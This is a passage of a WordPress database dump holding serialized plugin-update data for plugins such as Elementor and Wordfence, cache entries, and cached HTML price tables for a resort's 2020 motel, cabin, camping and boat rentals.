te_plugins','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1605545370;s:8:\"response\";a:5:{s:23:\"elementor/elementor.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:6:\"3.0.13\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.0.13.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=1427768\";s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.5.3\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:23:\"ml-slider/ml-slider.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/ml-slider\";s:4:\"slug\";s:9:\"ml-slider\";s:6:\"plugin\";s:23:\"ml-slider/ml-slider.php\";s:11:\"new_version\";s:6:\"3.19.0\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/ml-slider/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/ml-slider.3.19.0.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/ml-slider/assets/icon-256x256.png?rev=2370840\";s:2:\"1x\";s:54:\"https://ps.w.org/ml-slider/assets/icon.svg?rev=1837669\";s:3:\"svg\";s:54:\"https://ps.w.org/ml-slider/assets/icon.svg?rev=1837669\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/ml-slider/assets/banner-1544x500.png?rev=1837669\";s:2:\"1x\";s:64:\"https://ps.w.org/ml-slider/assets/banner-772x250.png?rev=2370840\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.6\";s:12:\"requires_php\";s:3:\"5.2\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:39:\"so-widgets-bundle/so-widgets-bundle.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:31:\"w.org/plugins/so-widgets-bundle\";s:4:\"slug\";s:17:\"so-widgets-bundle\";s:6:\"plugin\";s:39:\"so-widgets-bundle/so-widgets-bundle.php\";s:11:\"new_version\";s:7:\"1.17.10\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/so-widgets-bundle/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/so-widgets-bundle.1.17.10.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/so-widgets-bundle/assets/icon-256x256.png?rev=1044942\";s:2:\"1x\";s:70:\"https://ps.w.org/so-widgets-bundle/assets/icon-128x128.png?rev=1044942\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:72:\"https://ps.w.org/so-widgets-bundle/assets/banner-772x250.jpg?rev=1044942\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.5.3\";s:12:\"requires_php\";s:6:\"5.6.20\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:27:\"updraftplus/updraftplus.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/updraftplus\";s:4:\"slug\";s:11:\"updraftplus\";s:6:\"plugin\";s:27:\"updraftplus/updraftplus.php\";s:11:\"new_version\";s:7:\"1.16.34\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/updraftplus/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/updraftplus.1.16.34.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-256x256.jpg?rev=1686200\";s:2:\"1x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-128x128.jpg?rev=1686200\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/updraftplus/assets/banner-1544x500.png?rev=1686200\";s:2:\"1x\";s:66:\"https://ps.w.org/updraftplus/assets/banner-772x250.png?rev=1686200\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.5.3\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:6:\"15.2.1\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/wordpress-seo.15.2.1.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-256x256.png?rev=2363699\";s:2:\"1x\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";s:3:\"svg\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=1843435\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=1843435\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=1843435\";s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=1843435\";}s:6:\"tested\";s:5:\"5.5.3\";s:12:\"requires_php\";s:6:\"5.6.20\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:17:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"4.1.7\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.4.1.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}}s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:49:\"w.org/plugins/all-in-one-wp-security-and-firewall\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:6:\"plugin\";s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:11:\"new_version\";s:5:\"4.4.4\";s:3:\"url\";s:66:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/\";s:7:\"package\";s:78:\"https://downloads.wordpress.org/plugin/all-in-one-wp-security-and-firewall.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:88:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/icon-128x128.png?rev=1232826\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:91:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-1544x500.png?rev=1914011\";s:2:\"1x\";s:90:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-772x250.png?rev=1914013\";}s:11:\"banners_rtl\";a:0:{}}s:25:\"booking/wpdev-booking.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:21:\"w.org/plugins/booking\";s:4:\"slug\";s:7:\"booking\";s:6:\"plugin\";s:25:\"booking/wpdev-booking.php\";s:11:\"new_version\";s:6:\"8.7.10\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/booking/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/booking.8.7.10.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/booking/assets/icon-256x256.png?rev=1730848\";s:2:\"1x\";s:60:\"https://ps.w.org/booking/assets/icon-128x128.png?rev=1730848\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:62:\"https://ps.w.org/booking/assets/banner-772x250.png?rev=1623635\";}s:11:\"banners_rtl\";a:0:{}}s:37:\"booking-calendar/booking_calendar.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:30:\"w.org/plugins/booking-calendar\";s:4:\"slug\";s:16:\"booking-calendar\";s:6:\"plugin\";s:37:\"booking-calendar/booking_calendar.php\";s:11:\"new_version\";s:5:\"2.7.0\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/booking-calendar/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/booking-calendar.2.7.0.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/booking-calendar/assets/icon-128x128.png?rev=1307202\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:71:\"https://ps.w.org/booking-calendar/assets/banner-772x250.jpg?rev=1756241\";}s:11:\"banners_rtl\";a:0:{}}s:53:\"child-theme-configurator/child-theme-configurator.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/child-theme-configurator\";s:4:\"slug\";s:24:\"child-theme-configurator\";s:6:\"plugin\";s:53:\"child-theme-configurator/child-theme-configurator.php\";s:11:\"new_version\";s:5:\"2.5.6\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/child-theme-configurator/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/child-theme-configurator.2.5.6.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:77:\"https://ps.w.org/child-theme-configurator/assets/icon-128x128.png?rev=1557885\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:79:\"https://ps.w.org/child-theme-configurator/assets/banner-772x250.jpg?rev=1557885\";}s:11:\"banners_rtl\";a:0:{}}s:33:\"classic-editor/classic-editor.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/classic-editor\";s:4:\"slug\";s:14:\"classic-editor\";s:6:\"plugin\";s:33:\"classic-editor/classic-editor.php\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/classic-editor/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/classic-editor.1.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/classic-editor/assets/icon-256x256.png?rev=1998671\";s:2:\"1x\";s:67:\"https://ps.w.org/classic-editor/assets/icon-128x128.png?rev=1998671\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/classic-editor/assets/banner-1544x500.png?rev=1998671\";s:2:\"1x\";s:69:\"https://ps.w.org/classic-editor/assets/banner-772x250.png?rev=1998676\";}s:11:\"banners_rtl\";a:0:{}}s:39:\"devices-elementor/elementor-devices.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:31:\"w.org/plugins/devices-elementor\";s:4:\"slug\";s:17:\"devices-elementor\";s:6:\"plugin\";s:39:\"devices-elementor/elementor-devices.php\";s:11:\"new_version\";s:5:\"1.0.4\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/devices-elementor/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/devices-elementor.1.0.4.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:70:\"https://ps.w.org/devices-elementor/assets/icon-256x256.png?rev=1642785\";s:2:\"1x\";s:62:\"https://ps.w.org/devices-elementor/assets/icon.svg?rev=1642785\";s:3:\"svg\";s:62:\"https://ps.w.org/devices-elementor/assets/icon.svg?rev=1642785\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/devices-elementor/assets/banner-1544x500.png?rev=1664817\";s:2:\"1x\";s:72:\"https://ps.w.org/devices-elementor/assets/banner-772x250.png?rev=1664817\";}s:11:\"banners_rtl\";a:0:{}}s:32:\"duplicate-page/duplicatepage.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/duplicate-page\";s:4:\"slug\";s:14:\"duplicate-page\";s:6:\"plugin\";s:32:\"duplicate-page/duplicatepage.php\";s:11:\"new_version\";s:3:\"4.3\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/duplicate-page/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/duplicate-page.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:67:\"https://ps.w.org/duplicate-page/assets/icon-128x128.jpg?rev=1412874\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/duplicate-page/assets/banner-772x250.jpg?rev=1410328\";}s:11:\"banners_rtl\";a:0:{}}s:70:\"addon-elements-for-elementor-page-builder/elementor-addon-elements.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:55:\"w.org/plugins/addon-elements-for-elementor-page-builder\";s:4:\"slug\";s:41:\"addon-elements-for-elementor-page-builder\";s:6:\"plugin\";s:70:\"addon-elements-for-elementor-page-builder/elementor-addon-elements.php\";s:11:\"new_version\";s:5:\"1.7.1\";s:3:\"url\";s:72:\"https://wordpress.org/plugins/addon-elements-for-elementor-page-builder/\";s:7:\"package\";s:84:\"https://downloads.wordpress.org/plugin/addon-elements-for-elementor-page-builder.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:94:\"https://ps.w.org/addon-elements-for-elementor-page-builder/assets/icon-128x128.jpg?rev=1515290\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:96:\"https://ps.w.org/addon-elements-for-elementor-page-builder/assets/banner-772x250.jpg?rev=1515290\";}s:11:\"banners_rtl\";a:0:{}}s:9:\"hello.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}}s:39:\"siteorigin-panels/siteorigin-panels.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:31:\"w.org/plugins/siteorigin-panels\";s:4:\"slug\";s:17:\"siteorigin-panels\";s:6:\"plugin\";s:39:\"siteorigin-panels/siteorigin-panels.php\";s:11:\"new_version\";s:6:\"2.11.5\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/siteorigin-panels/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/siteorigin-panels.2.11.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/siteorigin-panels/assets/icon-256x256.png?rev=1044755\";s:2:\"1x\";s:70:\"https://ps.w.org/siteorigin-panels/assets/icon-128x128.png?rev=1044755\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:72:\"https://ps.w.org/siteorigin-panels/assets/banner-772x250.jpg?rev=1044755\";}s:11:\"banners_rtl\";a:0:{}}s:33:\"press-elements/press-elements.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/press-elements\";s:4:\"slug\";s:14:\"press-elements\";s:6:\"plugin\";s:33:\"press-elements/press-elements.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/press-elements/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/press-elements.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/press-elements/assets/icon-256x256.png?rev=1628502\";s:2:\"1x\";s:67:\"https://ps.w.org/press-elements/assets/icon-128x128.png?rev=1628502\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/press-elements/assets/banner-1544x500.png?rev=1628502\";s:2:\"1x\";s:69:\"https://ps.w.org/press-elements/assets/banner-772x250.png?rev=1628502\";}s:11:\"banners_rtl\";a:0:{}}s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:31:\"w.org/plugins/really-simple-ssl\";s:4:\"slug\";s:17:\"really-simple-ssl\";s:6:\"plugin\";s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";s:11:\"new_version\";s:5:\"3.3.5\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/really-simple-ssl/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/really-simple-ssl.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/really-simple-ssl/assets/icon-128x128.png?rev=1782452\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/really-simple-ssl/assets/banner-1544x500.png?rev=2320223\";s:2:\"1x\";s:72:\"https://ps.w.org/really-simple-ssl/assets/banner-772x250.png?rev=2320228\";}s:11:\"banners_rtl\";a:0:{}}s:57:\"ssl-insecure-content-fixer/ssl-insecure-content-fixer.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:40:\"w.org/plugins/ssl-insecure-content-fixer\";s:4:\"slug\";s:26:\"ssl-insecure-content-fixer\";s:6:\"plugin\";s:57:\"ssl-insecure-content-fixer/ssl-insecure-content-fixer.php\";s:11:\"new_version\";s:5:\"2.7.2\";s:3:\"url\";s:57:\"https://wordpress.org/plugins/ssl-insecure-content-fixer/\";s:7:\"package\";s:75:\"https://downloads.wordpress.org/plugin/ssl-insecure-content-fixer.2.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/ssl-insecure-content-fixer/assets/icon-256x256.png?rev=1363964\";s:2:\"1x\";s:79:\"https://ps.w.org/ssl-insecure-content-fixer/assets/icon-128x128.png?rev=1363964\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:81:\"https://ps.w.org/ssl-insecure-content-fixer/assets/banner-772x250.png?rev=1363964\";}s:11:\"banners_rtl\";a:0:{}}s:25:\"tablepress/tablepress.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:24:\"w.org/plugins/tablepress\";s:4:\"slug\";s:10:\"tablepress\";s:6:\"plugin\";s:25:\"tablepress/tablepress.php\";s:11:\"new_version\";s:4:\"1.12\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/tablepress/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/tablepress.1.12.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/tablepress/assets/icon-256x256.png?rev=1064192\";s:2:\"1x\";s:63:\"https://ps.w.org/tablepress/assets/icon-128x128.png?rev=1064192\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/tablepress/assets/banner-1544x500.png?rev=1275767\";s:2:\"1x\";s:65:\"https://ps.w.org/tablepress/assets/banner-772x250.png?rev=1275767\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/tablepress/assets/banner-1544x500-rtl.png?rev=1275767\";s:2:\"1x\";s:69:\"https://ps.w.org/tablepress/assets/banner-772x250-rtl.png?rev=1275767\";}}s:23:\"wordfence/wordfence.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:23:\"w.org/plugins/wordfence\";s:4:\"slug\";s:9:\"wordfence\";s:6:\"plugin\";s:23:\"wordfence/wordfence.php\";s:11:\"new_version\";s:6:\"7.4.12\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/wordfence/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/wordfence.7.4.12.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/wordfence/assets/icon-256x256.png?rev=2070855\";s:2:\"1x\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";s:3:\"svg\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wordfence/assets/banner-1544x500.jpg?rev=2124102\";s:2:\"1x\";s:64:\"https://ps.w.org/wordfence/assets/banner-772x250.jpg?rev=2124102\";}s:11:\"banners_rtl\";a:0:{}}s:24:\"wpforms-lite/wpforms.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:26:\"w.org/plugins/wpforms-lite\";s:4:\"slug\";s:12:\"wpforms-lite\";s:6:\"plugin\";s:24:\"wpforms-lite/wpforms.php\";s:11:\"new_version\";s:7:\"1.6.3.1\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/wpforms-lite/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wpforms-lite/assets/icon-256x256.png?rev=1371112\";s:2:\"1x\";s:65:\"https://ps.w.org/wpforms-lite/assets/icon-128x128.png?rev=1371112\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wpforms-lite/assets/banner-1544x500.png?rev=1371112\";s:2:\"1x\";s:67:\"https://ps.w.org/wpforms-lite/assets/banner-772x250.png?rev=1371112\";}s:11:\"banners_rtl\";a:0:{}}}}','no'),(62222,'_elementor_global_css','a:6:{s:4:\"time\";i:1604085972;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;b:0;}','yes'),(62225,'_transient_timeout_users_online','1604104749','no'),(62226,'_transient_users_online','a:1:{i:0;a:4:{s:7:\"user_id\";i:1;s:13:\"last_activity\";i:1604084949;s:10:\"ip_address\";s:13:\"47.203.137.20\";s:7:\"blog_id\";b:0;}}','no'),(62277,'_transient_timeout_sow:cleared','1605557029','no'),(62278,'_transient_sow:cleared','1','no'),(62297,'_transient_timeout_tablepress_5f14ca09ec2bd2292a5a8d08ace8bff2','1605361453','no'),(62298,'_transient_tablepress_5f14ca09ec2bd2292a5a8d08ace8bff2','\n<table id=\"tablepress-1\" class=\"tablepress tablepress-id-1\">\n<thead>\n<tr class=\"row-1 odd\">\n	<th class=\"column-1\">2020</th><th class=\"column-2\">Bedrooms</th><th class=\"column-3\">Weekday Nightly</th><th class=\"column-4\">Weekend Holiday Nightly</th><th class=\"column-5\">Weekly Sept. – May</th><th class=\"column-6\">Weekly June – Aug.</th><th class=\"column-7\">Maximum Capacity</th>\n</tr>\n</thead>\n<tbody class=\"row-hover\">\n<tr class=\"row-2 even\">\n	<td class=\"column-1\">Sleepers Motel</td><td class=\"column-2\">1</td><td class=\"column-3\">$90.</td><td class=\"column-4\">$100.00</td><td class=\"column-5\">$450.00</td><td class=\"column-6\">$550.00</td><td class=\"column-7\">4<br />\n</td>\n</tr>\n<tr class=\"row-3 odd\">\n	<td class=\"column-1\">Kitchenettes Motel</td><td class=\"column-2\">1</td><td class=\"column-3\">$110.00</td><td class=\"column-4\">$130.00</td><td class=\"column-5\">$600.00</td><td class=\"column-6\">$700.00</td><td class=\"column-7\">4</td>\n</tr>\n<tr class=\"row-4 even\">\n	<td class=\"column-1\">Suite 9</td><td class=\"column-2\">2</td><td class=\"column-3\">$200.00</td><td class=\"column-4\">$230.00</td><td class=\"column-5\">$1000.00</td><td class=\"column-6\">$1,175.00</td><td class=\"column-7\">4</td>\n</tr>\n<tr class=\"row-5 odd\">\n	<td class=\"column-1\">Cabins (#10 #11 #12)</td><td class=\"column-2\">2</td><td class=\"column-3\">$200.00</td><td class=\"column-4\">$230.00</td><td class=\"column-5\">$1000.00</td><td class=\"column-6\">$1,175.00</td><td class=\"column-7\">8</td>\n</tr>\n<tr class=\"row-6 even\">\n	<td class=\"column-1\">Cabins (#13 #14)</td><td class=\"column-2\">2</td><td class=\"column-3\">$220.00</td><td class=\"column-4\">$250.00</td><td class=\"column-5\">$1,100.00</td><td class=\"column-6\">$1,275.00</td><td class=\"column-7\">8</td>\n</tr>\n<tr class=\"row-7 odd\">\n	<td class=\"column-1\">Camping non-electric</td><td class=\"column-2\">1 per site</td><td class=\"column-3\">$35.00</td><td class=\"column-4\">$35.00</td><td class=\"column-5\">$180.00</td><td class=\"column-6\">$180.00</td><td class=\"column-7\"></td>\n</tr>\n<tr class=\"row-8 even\">\n	<td class=\"column-1\">Camping with electric</td><td class=\"column-2\">1  per site<br />\n</td><td class=\"column-3\">$45.00</td><td class=\"column-4\">$45.00</td><td class=\"column-5\">$250.00</td><td class=\"column-6\">$250.00</td><td class=\"column-7\"></td>\n</tr>\n<tr class=\"row-9 odd\">\n	<td class=\"column-1\">Drive Thru sites, elec, water and sewer</td><td class=\"column-2\">1 per site</td><td class=\"column-3\">$60.00</td><td class=\"column-4\">$60.00</td><td class=\"column-5\">$300.00</td><td class=\"column-6\">$300.00</td><td class=\"column-7\"></td>\n</tr>\n<tr class=\"row-10 even\">\n	<td class=\"column-1\">Pets (two pets per campsite)</td><td class=\"column-2\"></td><td class=\"column-3\">$10.00/ Pet</td><td class=\"column-4\">$10.00/ Pet</td><td class=\"column-5\">$50.00/ Pet</td><td class=\"column-6\">$50.00/ Pet</td><td class=\"column-7\"></td>\n</tr>\n<tr class=\"row-11 odd\">\n	<td class=\"column-1\">Pet in Cabins or Motel rooms</td><td class=\"column-2\"></td><td class=\"column-3\">$25.00/ Pet</td><td class=\"column-4\">$25.00/ Pet</td><td class=\"column-5\">$125.00/ Pet</td><td class=\"column-6\">$125.00/ Pet</td><td class=\"column-7\"></td>\n</tr>\n<tr class=\"row-12 even\">\n	<td class=\"column-1\">Additional People Camping (Each)</td><td class=\"column-2\"></td><td class=\"column-3\">$5.00</td><td class=\"column-4\">$5.00</td><td class=\"column-5\">$25.00<br />\n</td><td class=\"column-6\">$25.00<br />\n</td><td class=\"column-7\"></td>\n</tr>\n<tr class=\"row-13 odd\">\n	<td class=\"column-1\">Additional People in Motel and Cabins (Each)</td><td class=\"column-2\"></td><td class=\"column-3\">$25.00</td><td class=\"column-4\">$25.00</td><td class=\"column-5\">$125.00<br />\n</td><td class=\"column-6\">$125.00<br />\n</td><td class=\"column-7\"></td>\n</tr>\n</tbody>\n</table>\n','no'),(62299,'_transient_timeout_tablepress_d68fbb01d22f50b7fb9b0fe5948bfa88','1605361453','no'),(62300,'_transient_tablepress_d68fbb01d22f50b7fb9b0fe5948bfa88','\n<table id=\"tablepress-2\" class=\"tablepress tablepress-id-2\">\n<thead>\n<tr class=\"row-1 odd\">\n	<th class=\"column-1\">If Available</th><th class=\"column-2\">Daily</th><th class=\"column-3\">Weekly</th><th class=\"column-4\">&nbsp;</th>\n</tr>\n</thead>\n<tbody class=\"row-hover\">\n<tr class=\"row-2 even\">\n	<td class=\"column-1\">Paddle Boards, Paddle boat, Kayaks, Canoes</td><td class=\"column-2\">FREE</td><td class=\"column-3\">FREE</td><td class=\"column-4\"></td>\n</tr>\n<tr class=\"row-3 odd\">\n	<td class=\"column-1\">Boat Lifts</td><td class=\"column-2\">$20.00</td><td class=\"column-3\">$100.00</td><td class=\"column-4\"></td>\n</tr>\n<tr class=\"row-4 even\">\n	<td class=\"column-1\">Boat Launching/Docking</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\">$10.00 One time Fee</td>\n</tr>\n<tr class=\"row-5 odd\">\n	<td class=\"column-1\">20\' Pontoon with 25 H.P. Motor</td><td class=\"column-2\">$150.00</td><td class=\"column-3\">$600.00</td><td class=\"column-4\">Plus Gas</td>\n</tr>\n<tr class=\"row-6 even\">\n	<td class=\"column-1\">14 ft Lund Boat and 15 HP Motor</td><td class=\"column-2\">$50.00</td><td class=\"column-3\">$250.00</td><td class=\"column-4\">Plus Gas</td>\n</tr>\n<tr class=\"row-7 odd\">\n	<td class=\"column-1\">16 ft Pontoon with Bimini cover 40 HP Motor</td><td class=\"column-2\">$250.00</td><td class=\"column-3\">$1000.00</td><td class=\"column-4\">Plus Gas</td>\n</tr>\n<tr class=\"row-8 even\">\n	<td class=\"column-1\"></td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td>\n</tr>\n</tbody>\n</table>\n','no'),(62301,'_transient_timeout_tablepress_aed1ac695d3b2b26eddc94e330a0afa1','1605376872','no'),(62302,'_transient_tablepress_aed1ac695d3b2b26eddc94e330a0afa1','\n<table id=\"tablepress-3\" class=\"tablepress tablepress-id-3\">\n<thead>\n<tr class=\"row-1 odd\">\n	<th class=\"column-1\">&nbsp;</th><th class=\"column-2\">22-Aug</th><th class=\"column-3\">&nbsp;</th><th class=\"column-4\">&nbsp;</th><th class=\"column-5\">&nbsp;</th><th class=\"column-6\">&nbsp;</th><th class=\"column-7\">&nbsp;</th><th class=\"column-8\">&nbsp;</th><th class=\"column-9\">&nbsp;</th><th class=\"column-10\">29-Aug</th><th 